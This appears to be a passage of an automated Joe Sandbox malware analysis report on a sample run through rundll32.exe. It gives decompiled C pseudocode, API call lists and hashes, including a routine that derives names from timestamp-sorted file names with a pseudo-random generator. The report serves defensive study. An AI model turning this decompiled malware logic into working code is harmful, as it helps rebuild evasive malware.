                                                  0x04f47c84
                                                  0x04f47c88
                                                  0x04f47c8b
                                                  0x04f47c91
                                                  0x04f47c95
                                                  0x04f47c98
                                                  0x04f47ca3
                                                  0x04f47c9a
                                                  0x04f47c9a
                                                  0x04f47c9a
                                                  0x04f47c98
                                                  0x04f47cb1

                                                  APIs
                                                  • memset.NTDLL ref: 04F47C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04F47C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04F47C91
                                                  • CloseHandle.KERNEL32(?), ref: 04F47CA3
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: de5fdd6b82c0a659f3937c6ae03a669d35483d2e2e8df7fd8a92623456471e9b
                                                  • Instruction ID: 427d0d39fbe8e7a9aad595c55308757a91b29199d66b81353927a50a9892ccbd
                                                  • Opcode Fuzzy Hash: de5fdd6b82c0a659f3937c6ae03a669d35483d2e2e8df7fd8a92623456471e9b
                                                  • Instruction Fuzzy Hash: D1F0F4B550530CBFE3106F66ECC0D27BFECFBC51D9B11492DF14581541DA36A81A9AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F475E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E04F475E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4f4d32c; // 0x70795b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4f4d32c; // 0x70795b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4f4d030) {
					HeapFree( *0x4f4d238, 0, _t8);
				}
				_t14[1] = E04F494A9(_v0, _t14);
				_t11 =  *0x4f4d32c; // 0x70795b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                  0x04f475e9
                                                  0x04f475e9
                                                  0x04f475f2
                                                  0x04f47602
                                                  0x04f47602
                                                  0x04f47607
                                                  0x04f4760c
                                                  0x00000000
                                                  0x00000000
                                                  0x04f475fc
                                                  0x04f475fc
                                                  0x04f4760e
                                                  0x04f47612
                                                  0x04f47624
                                                  0x04f47624
                                                  0x04f47634
                                                  0x04f47637
                                                  0x04f4763c
                                                  0x04f47640
                                                  0x04f47646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F475F2
                                                  • Sleep.KERNEL32(0000000A,?,04F423DE), ref: 04F475FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,04F423DE), ref: 04F47624
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F47640
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 98fd3952970f5acca50eb11db9b8e21de41de589f3ee815fd783a14dc8b2885f
                                                  • Instruction ID: abcc43ddf9315aa22f300282e031fe99557b31c39505084b10fe12a7032ca1c2
                                                  • Opcode Fuzzy Hash: 98fd3952970f5acca50eb11db9b8e21de41de589f3ee815fd783a14dc8b2885f
                                                  • Instruction Fuzzy Hash: 38F0D479A01285DBE760AB7DF948E167BE8EFA4740B058405F802D7250EF7CEC02CA25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04F4970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4f4d26c; // 0x31c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4f4d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4f4d26c; // 0x31c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4f4d238; // 0x6c80000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                  0x04f4970f
                                                  0x04f49716
                                                  0x04f49760
                                                  0x04f49762
                                                  0x04f49762
                                                  0x04f4971a
                                                  0x04f49720
                                                  0x04f49725
                                                  0x04f49729
                                                  0x04f4972f
                                                  0x04f49736
                                                  0x00000000
                                                  0x00000000
                                                  0x04f49738
                                                  0x04f4973d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4973d
                                                  0x04f4973f
                                                  0x04f49747
                                                  0x04f4974a
                                                  0x04f4974a
                                                  0x04f49750
                                                  0x04f49757
                                                  0x04f4975a
                                                  0x04f4975a
                                                  0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,04F48099), ref: 04F4971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 04F49729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 04F4974A
                                                  • HeapDestroy.KERNEL32(06C80000), ref: 04F4975A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: d41ef18eacf5a4e8c319b9a678b9b872b3ed9f23289c6f47334b09af2026e91b
                                                  • Instruction ID: 07266ab1fcee57a04b84986f62d1ebd6335b569af71b559f67d7ea5ca25ac0f2
                                                  • Opcode Fuzzy Hash: d41ef18eacf5a4e8c319b9a678b9b872b3ed9f23289c6f47334b09af2026e91b
                                                  • Instruction Fuzzy Hash: 95F030B9B063185BFB20AE79B988F073BA8EBA0B61B050610F814D7780DF6CED40D750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4A5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E04F4A5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4f4d32c; // 0x70795b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4f4d32c; // 0x70795b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4f4d32c; // 0x70795b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4f4e836) {
					HeapFree( *0x4f4d238, 0, _t10);
					_t7 =  *0x4f4d32c; // 0x70795b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                  0x04f4a5d6
                                                  0x04f4a5df
                                                  0x04f4a5ef
                                                  0x04f4a5ef
                                                  0x04f4a5f4
                                                  0x04f4a5f9
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4a5e9
                                                  0x04f4a5e9
                                                  0x04f4a5fb
                                                  0x04f4a600
                                                  0x04f4a604
                                                  0x04f4a617
                                                  0x04f4a61d
                                                  0x04f4a61d
                                                  0x04f4a626
                                                  0x04f4a628
                                                  0x04f4a62c
                                                  0x04f4a632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F4A5DF
                                                  • Sleep.KERNEL32(0000000A,?,04F423DE), ref: 04F4A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,04F423DE), ref: 04F4A617
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F4A62C
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 2d7778a2e1d11ab6529e510e3ec55e1bccc90ca97b05462d2f76ed71f314b1eb
                                                  • Instruction ID: a2ab8f29009bad994c797a47d32d6925cbb8913d053e931ed3afba1b5b4e46a6
                                                  • Opcode Fuzzy Hash: 2d7778a2e1d11ab6529e510e3ec55e1bccc90ca97b05462d2f76ed71f314b1eb
                                                  • Instruction Fuzzy Hash: 53F0D47DA411449BE7189F39F959E267BA4EBE8701B058409E802DB254CF3CEC01CE24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F47F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E04F47F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04F42049(_t2);
				if(_t34 != 0) {
					_t30 = E04F42049(_t28);
					if(_t30 == 0) {
						E04F49039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04F4A911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04F4A911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                  0x04f47f27
                                                  0x04f47f31
                                                  0x04f47f33
                                                  0x04f47f39
                                                  0x04f47f39
                                                  0x04f47f42
                                                  0x04f47f46
                                                  0x04f47f52
                                                  0x04f47f56
                                                  0x04f47fca
                                                  0x04f47f58
                                                  0x04f47f58
                                                  0x04f47f5c
                                                  0x04f47f63
                                                  0x04f47f66
                                                  0x04f47f80
                                                  0x04f47f6f
                                                  0x04f47f6f
                                                  0x04f47f73
                                                  0x04f47f76
                                                  0x04f47f7b
                                                  0x04f47f7b
                                                  0x04f47f85
                                                  0x04f47fad
                                                  0x04f47fb3
                                                  0x04f47fb6
                                                  0x04f47f87
                                                  0x04f47f89
                                                  0x04f47f91
                                                  0x04f47f9c
                                                  0x04f47fa1
                                                  0x04f47fa1
                                                  0x04f47fbd
                                                  0x04f47fc4
                                                  0x04f47fc5
                                                  0x04f47fc5
                                                  0x04f47f56
                                                  0x04f47fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?,?,00000000), ref: 04F47F33
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                    • Part of subcall function 04F4A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F47F61,00000000,00000001,00000001,?,?,04F415A4,?,?,?,?,00000102), ref: 04F4A91F
                                                    • Part of subcall function 04F4A911: StrChrA.SHLWAPI(?,0000003F,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?,?,00000000,00000000), ref: 04F4A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?), ref: 04F47F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F47FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F47FAD
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: ab20cb696eff27e145f13e1dec3614f22945779acced2a79a6aa44a8296a81b9
                                                  • Instruction ID: 45f654e65c1f01bf35c60251ad33ffe970e5ee0481e0a9a68f2b3f22d3d578aa
                                                  • Opcode Fuzzy Hash: ab20cb696eff27e145f13e1dec3614f22945779acced2a79a6aa44a8296a81b9
                                                  • Instruction Fuzzy Hash: CD210532904215FFDB12AFA8DC44AAEBFE8EF85294B064054F8059B201DF34E90287F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F47CB8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04F47CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04F42049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                  0x04f47ccd
                                                  0x04f47cd1
                                                  0x04f47cdb
                                                  0x04f47ce2
                                                  0x04f47ce5
                                                  0x04f47ce7
                                                  0x04f47cef
                                                  0x04f47cf4
                                                  0x04f47d02
                                                  0x04f47d07
                                                  0x04f47d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,0707937C,?,04F4747C,004F0053,0707937C,?,?,?,?,?,?,04F46814), ref: 04F47CC8
                                                  • lstrlenW.KERNEL32(04F4747C,?,04F4747C,004F0053,0707937C,?,?,?,?,?,?,04F46814), ref: 04F47CCF
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04F4747C,004F0053,0707937C,?,?,?,?,?,?,04F46814), ref: 04F47CEF
                                                  • memcpy.NTDLL(751469A0,04F4747C,00000002,00000000,004F0053,751469A0,?,?,04F4747C,004F0053,0707937C), ref: 04F47D02
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: 7563674388df65e267971cbd411544c63fb4d217d5bd615551505a22001507db
                                                  • Instruction ID: d07eba62d34051b20320f290693a1c43cfdad5629bbc59c9949b1e7873ec2b9d
                                                  • Opcode Fuzzy Hash: 7563674388df65e267971cbd411544c63fb4d217d5bd615551505a22001507db
                                                  • Instruction Fuzzy Hash: DDF03C76900118BBDB11EFA8CC44CDE7BACEE492587014062AA08D7211EA31EA158BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F43CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(070787FA,00000000,00000000,74ECC740,04F4A453,00000000), ref: 04F43CD8
                                                  • lstrlen.KERNEL32(?), ref: 04F43CE0
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • lstrcpy.KERNEL32(00000000,070787FA), ref: 04F43CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04F43CFF
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 177bdaa99f51e1ba5d1312b1daeda08da36c5ca83d0912255ad3cc8469186069
                                                  • Instruction ID: 372208d5f31732e721a3e0f65112ac1e68060c26d2b3cbadec7f71ee93abfc36
                                                  • Opcode Fuzzy Hash: 177bdaa99f51e1ba5d1312b1daeda08da36c5ca83d0912255ad3cc8469186069
                                                  • Instruction Fuzzy Hash: D1E09237A02268A787119FE9BC48C6FBBADEFD96517064426FA00D3110DF289C018BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: rundll32.exe PID: 6568 Parent PID: 1132 rundll32.exeCOMMON

                                                  Executed Functions

                                                  Function 052D12D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E052D12D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x52dd278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x52dd238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x52dd278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x52dd238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x52dd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x52dd278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x52dd27c; // 0x202a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x52de7f2; // 0x73797325
				_t83 = E052D95B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x52dd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x52dd27c; // 0x202a5a8
				_t16 = _t93 + 0x52de813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                  0x052d12dd
                                                  0x052d12e3
                                                  0x052d12e5
                                                  0x052d12ff
                                                  0x052d1303
                                                  0x052d1306
                                                  0x052d157b
                                                  0x052d1582
                                                  0x052d1582
                                                  0x052d130c
                                                  0x052d1321
                                                  0x052d1323
                                                  0x052d1327
                                                  0x052d132a
                                                  0x052d156b
                                                  0x052d1575
                                                  0x00000000
                                                  0x052d1575
                                                  0x052d1330
                                                  0x052d133b
                                                  0x052d1340
                                                  0x052d1345
                                                  0x052d1348
                                                  0x052d134f
                                                  0x052d1356
                                                  0x052d1359
                                                  0x052d155b
                                                  0x052d1565
                                                  0x00000000
                                                  0x052d1565
                                                  0x052d136f
                                                  0x052d1373
                                                  0x052d1376
                                                  0x052d1379
                                                  0x052d1381
                                                  0x052d1384
                                                  0x052d138d
                                                  0x052d1393
                                                  0x052d139d
                                                  0x052d13a4
                                                  0x052d13a4
                                                  0x052d13b6
                                                  0x052d13c1
                                                  0x052d13cf
                                                  0x052d13d4
                                                  0x052d13d9
                                                  0x052d13dc
                                                  0x052d13e1
                                                  0x052d13eb
                                                  0x052d13ee
                                                  0x052d13f1
                                                  0x052d1407
                                                  0x052d140b
                                                  0x052d140e
                                                  0x052d1559
                                                  0x00000000
                                                  0x052d1559
                                                  0x052d1425
                                                  0x052d1476
                                                  0x052d1439
                                                  0x052d1441
                                                  0x052d1446
                                                  0x052d1454
                                                  0x052d145d
                                                  0x052d1466
                                                  0x052d1466
                                                  0x052d1474
                                                  0x052d1474
                                                  0x052d147a
                                                  0x052d147e
                                                  0x052d147e
                                                  0x052d1484
                                                  0x00000000
                                                  0x00000000
                                                  0x052d1486
                                                  0x052d148c
                                                  0x052d1533
                                                  0x052d1536
                                                  0x052d1543
                                                  0x052d1543
                                                  0x052d1547
                                                  0x00000000
                                                  0x00000000
                                                  0x052d153c
                                                  0x052d1540
                                                  0x052d1540
                                                  0x052d1542
                                                  0x052d1542
                                                  0x052d154c
                                                  0x052d1553
                                                  0x052d1555
                                                  0x00000000
                                                  0x052d1555
                                                  0x052d1492
                                                  0x052d1494
                                                  0x052d1494
                                                  0x052d14a7
                                                  0x052d14ad
                                                  0x052d14b8
                                                  0x052d14ba
                                                  0x052d14be
                                                  0x052d14c0
                                                  0x052d14c0
                                                  0x052d14c5
                                                  0x052d14c7
                                                  0x052d14c7
                                                  0x052d14c5
                                                  0x052d14cc
                                                  0x052d14d0
                                                  0x052d14d0
                                                  0x052d14e0
                                                  0x052d14e5
                                                  0x052d14e8
                                                  0x052d14e8
                                                  0x052d14eb
                                                  0x052d14f5
                                                  0x052d14fd
                                                  0x052d1502
                                                  0x052d1510
                                                  0x052d1510
                                                  0x052d1524
                                                  0x052d1528
                                                  0x052d1528

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 052D12FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 052D1321
                                                  • memset.NTDLL ref: 052D133B
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,052D23E9,63699BCE,052D1354,73797325), ref: 052D95C2
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 052D95DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 052D1379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 052D138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 052D13A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 052D13B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 052D13F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 052D1407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 052D1425
                                                  • FindNextFileA.KERNELBASE(052D96C1,?), ref: 052D1439
                                                  • FindClose.KERNEL32(052D96C1), ref: 052D1446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 052D1452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 052D1474
